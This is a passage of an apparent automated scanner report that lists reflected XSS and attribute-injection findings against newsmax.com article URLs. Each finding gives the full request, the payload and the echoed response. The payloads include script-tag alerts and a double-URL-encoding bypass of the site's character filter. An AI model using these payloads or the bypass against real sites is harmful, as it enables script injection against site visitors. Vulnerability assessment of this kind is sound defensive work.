Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46591
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Bulim
...[SNIP]...
<a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?eae9b"><script>alert(1)</script>e60bdf8e5f5=1')"
class="article_tools_link">
...[SNIP]...

1.17. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f36c'%20a%3db%209c59266b336 was submitted in the REST URL parameter 2. This input was echoed as 6f36c' a=b 9c59266b336 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV6f36c'%20a%3db%209c59266b336/2011/03/18/id/389912 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45710
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   HPV:
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV6f36c' a=b 9c59266b336/2011/03/18/id/389912'
class="article_tools_link">
...[SNIP]...

1.18. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 625a6'%20a%3db%203c060553950 was submitted in the REST URL parameter 3. This input was echoed as 625a6' a=b 3c060553950 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011625a6'%20a%3db%203c060553950/03/18/id/389912 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45710
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   HPV:
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011625a6' a=b 3c060553950/03/18/id/389912'
class="article_tools_link">
...[SNIP]...

1.19. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aca5'%20a%3db%2043ce35206ee was submitted in the REST URL parameter 4. This input was echoed as 7aca5' a=b 43ce35206ee in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/037aca5'%20a%3db%2043ce35206ee/18/id/389912 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45710
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   HPV:
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/037aca5' a=b 43ce35206ee/18/id/389912'
class="article_tools_link">
...[SNIP]...

1.20. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650ed'%20a%3db%20c4f3c295575 was submitted in the REST URL parameter 5. This input was echoed as 650ed' a=b c4f3c295575 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18650ed'%20a%3db%20c4f3c295575/id/389912 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45710
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   HPV:
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18650ed' a=b c4f3c295575/id/389912'
class="article_tools_link">
...[SNIP]...

1.21. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93798%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4bf8f812a6e was submitted in the REST URL parameter 7. This input was echoed as 93798"><img src=a onerror=alert(1)>4bf8f812a6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991293798%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4bf8f812a6e HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 42174
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(38991293798"><img src=a onerror=alert(1)>4bf8f812a6e);"
class="article_tools_link">
...[SNIP]...

1.22. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63b74'%20a%3db%202a564a64376 was submitted in the REST URL parameter 7. This input was echoed as 63b74' a=b 2a564a64376 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991263b74'%20a%3db%202a564a64376 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41730
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991263b74' a=b 2a564a64376'
class="article_tools_link">
...[SNIP]...

1.23. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91767"><script>alert(1)</script>440de3016dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?91767"><script>alert(1)</script>440de3016dd=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45937
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   HPV:
...[SNIP]...
wdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?91767"><script>alert(1)</script>440de3016dd=1')"
class="article_tools_link">
...[SNIP]...

1.24. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cd1b'><script>alert(1)</script>051994016ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?1cd1b'><script>alert(1)</script>051994016ee=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45932
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   HPV:
...[SNIP]...
a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?1cd1b'><script>alert(1)</script>051994016ee=1'
class="article_tools_link">
...[SNIP]...

1.25. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44a6d'%20a%3db%20ed277f82d16 was submitted in the REST URL parameter 2. This input was echoed as 44a6d' a=b ed277f82d16 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-44a6d'%20a%3db%20ed277f82d16/2011/03/18/id/389917 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45965
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
smax.com/contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-44a6d' a=b ed277f82d16/2011/03/18/id/389917'
class="article_tools_link">
...[SNIP]...

1.26. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49a3c'%20a%3db%203b54920ef53 was submitted in the REST URL parameter 3. This input was echoed as 49a3c' a=b 3b54920ef53 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/201149a3c'%20a%3db%203b54920ef53/03/18/id/389917 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45965
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
com/contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/201149a3c' a=b 3b54920ef53/03/18/id/389917'
class="article_tools_link">
...[SNIP]...

1.27. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1c200'%20a%3db%20f3dc1d27183 was submitted in the REST URL parameter 4. This input was echoed as 1c200' a=b f3dc1d27183 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/031c200'%20a%3db%20f3dc1d27183/18/id/389917 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45965
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
/contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/031c200' a=b f3dc1d27183/18/id/389917'
